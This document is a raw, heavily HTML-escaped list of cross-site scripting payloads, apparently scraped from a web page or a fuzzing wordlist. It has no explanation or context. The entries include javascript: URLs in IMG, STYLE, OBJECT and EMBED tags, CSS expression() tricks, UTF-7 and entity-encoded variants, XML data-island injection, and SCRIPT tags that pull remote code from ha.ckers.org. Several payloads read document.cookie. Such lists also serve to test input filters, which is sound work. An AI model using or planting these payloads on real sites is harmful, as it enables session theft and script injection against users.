&amp;quot;&amp;amp;lt;DIV STYLE=&amp;quot;&amp;quot;background-image: url(&amp;amp;amp;#1;javascript:alert('XSS'))&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;DIV STYLE=&amp;quot;&amp;quot;width: expression(alert('XSS'));&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE&amp;amp;gt;@im\port'\ja\vasc\ript:alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)';&amp;amp;lt;/STYLE&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG STYLE=&amp;quot;&amp;quot;xss:expr/*XSS*/ession(alert('XSS'))&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;XSS STYLE=&amp;quot;&amp;quot;xss:expression(alert('XSS'))&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;exp/*&amp;amp;lt;A STYLE='no\xss:noxss(&amp;quot;&amp;quot;*//*&amp;quot;&amp;quot;);xss:ex/*XSS*//*/*/pression(alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;))'&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE TYPE=&amp;quot;&amp;quot;text/javascript&amp;quot;&amp;quot;&amp;amp;gt;alert('XSS');&amp;amp;lt;/STYLE&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE&amp;amp;gt;.XSS{background-image:url(&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;);}&amp;amp;lt;/STYLE&amp;amp;gt;&amp;amp;lt;A CLASS=XSS&amp;amp;gt;&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE type=&amp;quot;&amp;quot;text/css&amp;quot;&amp;quot;&amp;amp;gt;BODY{background:url(&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;)}&amp;amp;lt;/STYLE&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;!--[if gte IE 4]&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert('XSS');&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;amp;lt;![endif]--&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;BASE HREF=&amp;quot;&amp;quot;javascript:alert('XSS');//&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;OBJECT TYPE=&amp;quot;&amp;quot;text/x-scriptlet&amp;quot;&amp;quot; DATA=&amp;quot;&amp;quot;http://ha.ckers.org/scriptlet.html&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/OBJECT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389&amp;amp;gt;&amp;amp;lt;param name=url value=javascript:alert('XSS')&amp;amp;gt;&amp;amp;lt;/OBJECT&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;EMBED SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.swf&amp;quot;&amp;quot; AllowScriptAccess=&amp;quot;&amp;quot;always&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/EMBED&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;EMBED SRC=&amp;quot;&amp;quot;data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==&amp;quot;&amp;quot; type=&amp;quot;&amp;quot;image/svg+xml&amp;quot;&amp;quot; AllowScriptAccess=&amp;quot;&amp;quot;always&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/EMBED&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;HTML xmlns:xss&amp;amp;gt;&amp;amp;lt;?import namespace=&amp;quot;&amp;quot;xss&amp;quot;&amp;quot; implementation=&amp;quot;&amp;quot;http://ha.ckers.org/xss.htc&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;xss:xss&amp;amp;gt;XSS&amp;amp;lt;/xss:xss&amp;amp;gt;&amp;amp;lt;/HTML&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;XML ID=I&amp;amp;gt;&amp;amp;lt;X&amp;amp;gt;&amp;amp;lt;C&amp;amp;gt;&amp;amp;lt;![CDATA[&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javas]]&amp;amp;gt;&amp;amp;lt;![CDATA[cript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;]]&amp;amp;gt;&amp;amp;lt;/C&amp;amp;gt;&amp;amp;lt;/X&amp;amp;gt;&amp;amp;lt;/xml&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;XML ID=&amp;quot;&amp;quot;xss&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;I&amp;amp;gt;&amp;amp;lt;B&amp;amp;gt;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javas&amp;amp;lt;!-- --&amp;amp;gt;cript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/B&amp;amp;gt;&amp;amp;lt;/I&amp;amp;gt;&amp;amp;lt;/XML&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=&amp;quot;&amp;quot;#xss&amp;quot;&amp;quot; DATAFLD=&amp;quot;&amp;quot;B&amp;quot;&amp;quot; DATAFORMATAS=&amp;quot;&amp;quot;HTML&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;XML SRC=&amp;quot;&amp;quot;xsstest.xml&amp;quot;&amp;quot; ID=I&amp;amp;gt;&amp;amp;lt;/XML&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;HTML&amp;amp;gt;&amp;amp;lt;BODY&amp;amp;gt;&amp;amp;lt;?xml:namespace prefix=&amp;quot;&amp;quot;t&amp;quot;&amp;quot; ns=&amp;quot;&amp;quot;urn:schemas-microsoft-com:time&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;?import namespace=&amp;quot;&amp;quot;t&amp;quot;&amp;quot; implementation=&amp;quot;&amp;quot;#default#time2&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;t:set attributeName=&amp;quot;&amp;quot;innerHTML&amp;quot;&amp;quot; to=&amp;quot;&amp;quot;XSS&amp;amp;lt;SCRIPT DEFER&amp;amp;gt;alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/BODY&amp;amp;gt;&amp;amp;lt;/HTML&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.jpg&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;!--#exec cmd=&amp;quot;&amp;quot;/bin/echo '&amp;amp;lt;SCR'&amp;quot;&amp;quot;--&amp;amp;gt;&amp;amp;lt;!--#exec cmd=&amp;quot;&amp;quot;/bin/echo 'IPT SRC=http://ha.ckers.org/xss.js&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;'&amp;quot;&amp;quot;--&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;? echo('&amp;amp;lt;SCR)';echo('IPT&amp;amp;gt;alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)&amp;amp;lt;/SCRIPT&amp;amp;gt;');&amp;amp;nbsp;?&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;Set-Cookie&amp;quot;&amp;quot; Content=&amp;quot;&amp;quot;USERID=&amp;amp;lt;SCRIPT&amp;amp;gt;alert('XSS')&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;HEAD&amp;amp;gt;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;CONTENT-TYPE&amp;quot;&amp;quot; CONTENT=&amp;quot;&amp;quot;text/html; charset=UTF-7&amp;quot;&amp;quot;&amp;amp;gt; &amp;amp;lt;/HEAD&amp;amp;gt;+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT a=&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&amp;quot; SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT =&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&amp;quot; SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT a=&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&amp;quot; '' SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT &amp;quot;&amp;quot;a='&amp;amp;gt;'&amp;quot;&amp;quot; SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT a=`&amp;amp;gt;` SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT a=&amp;quot;&amp;quot;&amp;amp;gt;'&amp;amp;gt;&amp;quot;&amp;quot; SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT&amp;amp;gt;document.write(&amp;quot;&amp;quot;&amp;amp;lt;SCRI&amp;quot;&amp;quot;);&amp;amp;lt;/SCRIPT&amp;amp;gt;PT SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://66.102.7.147/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://1113982867/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://0x42.0x0000066.0x7.0x93/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://0102.0146.0007.00000223/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;h\ntt\tp://6&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;//www.google.com/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;//google&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://google.com/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://www.google.com./&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;javascript:document.location='http://www.google.com/'&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://www.gohttp://www.google.com/ogle.com/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div onmouseover=&amp;quot;&amp;quot;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img src=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;input type=&amp;quot;&amp;quot;image&amp;quot;&amp;quot; dynsrc=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;bgsound src=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;amp;{document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);};&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img src=&amp;amp;amp;{document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);};&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;link rel=&amp;quot;&amp;quot;stylesheet&amp;quot;&amp;quot; href=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;iframe src=&amp;quot;&amp;quot;vbscript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img src=&amp;quot;&amp;quot;livescript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;a href=&amp;quot;&amp;quot;about:&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;meta http-equiv=&amp;quot;&amp;quot;refresh&amp;quot;&amp;quot; content=&amp;quot;&amp;quot;0;url=javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;body onload=&amp;quot;&amp;quot;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div style=&amp;quot;&amp;quot;background-image: url(javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;););&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div style=&amp;quot;&amp;quot;behaviour: url([link to code]);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div style=&amp;quot;&amp;quot;binding: url([link to code]);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div style=&amp;quot;&amp;quot;width: expression(document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;););&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;style type=&amp;quot;&amp;quot;text/javascript&amp;quot;&amp;quot;&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/style&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;object classid=&amp;quot;&amp;quot;clsid:...&amp;quot;&amp;quot; codebase=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;style&amp;amp;gt;&amp;amp;lt;!--&amp;amp;lt;/style&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);//--&amp;amp;gt;&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;![CDATA[&amp;amp;lt;!--]]&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);//--&amp;amp;gt;&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img src=&amp;quot;&amp;quot;blah&amp;quot;&amp;quot;onmouseover=&amp;quot;&amp;quot;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img src=&amp;quot;&amp;quot;blah&amp;amp;gt;&amp;quot;&amp;quot; onmouseover=&amp;quot;&amp;quot;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div datafld=&amp;quot;&amp;quot;b&amp;quot;&amp;quot; dataformatas=&amp;quot;&amp;quot;html&amp;quot;&amp;quot; datasrc=&amp;quot;&amp;quot;#X&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/div&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;a href=&amp;quot;&amp;quot;javascript#document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img dynsrc=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;amp;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img src=&amp;quot;&amp;quot;mocha:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div style=&amp;quot;&amp;quot;binding: url([link to code]);&amp;quot;&amp;quot;&amp;amp;gt; [Mozilla]&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;!-- -- --&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/script&amp;amp;gt;&amp;amp;lt;!-- -- --&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;xml src=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;xml id=&amp;quot;&amp;quot;X&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;a&amp;amp;gt;&amp;amp;lt;b&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/script&amp;amp;gt;;&amp;amp;lt;/b&amp;amp;gt;&amp;amp;lt;/a&amp;amp;gt;&amp;amp;lt;/xml&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;[\xC0][\xBC]script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);[\xC0][\xBC]/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;script&amp;amp;gt;alert(&amp;quot;&amp;quot;WXSS&amp;quot;&amp;quot;)&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;&amp;amp;lt;script&amp;amp;gt;alert(&amp;quot;&amp;quot;WXSS&amp;quot;&amp;quot;);//&amp;amp;lt;&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;script&amp;amp;gt;alert(document.cookie)&amp;amp;lt;/script&amp;amp;gt;&lt;br /&gt;
'&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;alert(document.cookie)&amp;amp;lt;/script&amp;amp;gt;&lt;br /&gt;
'&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;alert(document.cookie);&amp;amp;lt;/script&amp;amp;gt;&lt;br /&gt;
&amp;quot;%3cscript%3ealert(&amp;quot;&amp;quot;WXSS&amp;quot;&amp;quot;);%3c/script%3e&amp;quot;&lt;br /&gt;
%3cscript%3ealert(document.cookie);%3c%2fscript%3e&lt;br /&gt;
%3Cscript%3Ealert(%22X%20SS%22);%3C/script%3E&lt;br /&gt;
&amp;amp;amp;ltscript&amp;amp;amp;gtalert(document.cookie);&amp;amp;lt;/script&amp;amp;gt;&lt;br /&gt;
&amp;amp;amp;ltscript&amp;amp;amp;gtalert(document.cookie);&amp;amp;amp;ltscript&amp;amp;amp;gtalert&lt;br /&gt;
&amp;amp;lt;xss&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;alert('WXSS')&amp;amp;lt;/script&amp;amp;gt;&amp;amp;lt;/vulnerable&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC='javascript:alert(document.cookie)'&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;javascript:alert('WXSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;javascript:alert('WXSS')&amp;quot;&amp;quot;&amp;quot;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=JaVaScRiPt:alert('WXSS')&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=javascript:alert(&amp;quot;WXSS&amp;quot;)&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=`javascript:alert(&amp;quot;&amp;quot;'WXSS'&amp;quot;&amp;quot;)`&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(&amp;quot;&amp;quot;WXSS&amp;quot;&amp;quot;)&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=javascript:alert(String.fromCharCode(88,83,83))&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC='javasc&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;jav&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;jav	ascript:alert('WXSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;jav&lt;br /&gt;
ascript:alert('WXSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;jav&lt;br /&gt;
ascript:alert('WXSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;%20&amp;amp;amp;#14;%20javascript:alert('WXSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20DYNSRC=&amp;quot;&amp;quot;javascript:alert('WXSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20LOWSRC=&amp;quot;&amp;quot;javascript:alert('WXSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC='%26%23x6a;avasc%26%23000010ript:a%26%23x6c;ert(document.%26%23x63;ookie)'&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=javascript:alert('XSS')&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=&amp;amp;amp;#0000106&amp;amp;amp;#0000097&amp;amp;amp;#0000118&amp;amp;amp;#0000097&amp;amp;amp;#0000115&amp;amp;amp;#0000099&amp;amp;amp;#0000114&amp;amp;amp;#0000105&amp;amp;amp;#0000112&amp;amp;amp;#0000116&amp;amp;amp;#0000058&amp;amp;amp;#0000097&amp;amp;amp;#0000108&amp;amp;amp;#0000101&amp;amp;amp;#0000114&amp;amp;amp;#0000116&amp;amp;amp;#0000040&amp;amp;amp;#0000039&amp;amp;amp;#0000088&amp;amp;amp;#0000083&amp;amp;amp;#0000083&amp;amp;amp;#0000039&amp;amp;amp;#0000041&amp;amp;gt;&lt;br /&gt;
